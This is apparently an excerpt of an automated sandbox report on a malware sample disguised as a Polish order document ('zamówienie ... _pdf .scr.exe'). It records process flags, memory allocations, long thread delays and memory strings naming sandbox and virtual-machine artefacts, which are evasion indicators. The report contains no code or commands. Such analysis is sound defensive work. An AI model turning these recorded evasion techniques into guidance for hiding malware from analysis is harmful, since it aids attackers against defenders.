Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Memory allocated: 2C688CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Memory allocated: 2C6A2700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Memory allocated: 26428960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Memory allocated: 26442230000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Window / User API: threadDelayed 7772			Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Window / User API: threadDelayed 2036			Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 6028	Thread sleep count: 7772 > 30	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 6028	Thread sleep count: 2036 > 30	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99325s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -99089s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -98982s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -98859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -98747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -98616s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97308s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -96093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95944s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95583s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95273s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95166s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -95053s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94926s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe TID: 5876	Thread sleep time: -94000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99325	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 99089	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 98982	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 98859	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 98747	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 98616	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97999	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97649	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97421	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97308	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97187	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96640	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96421	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 96093	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95944	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95828	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95718	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95583	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95273	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95166	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 95053	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94926	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94797	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94672	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94562	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94453	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94343	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94234	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94109	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Thread delayed: delay time: 94000	Jump to behavior

Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
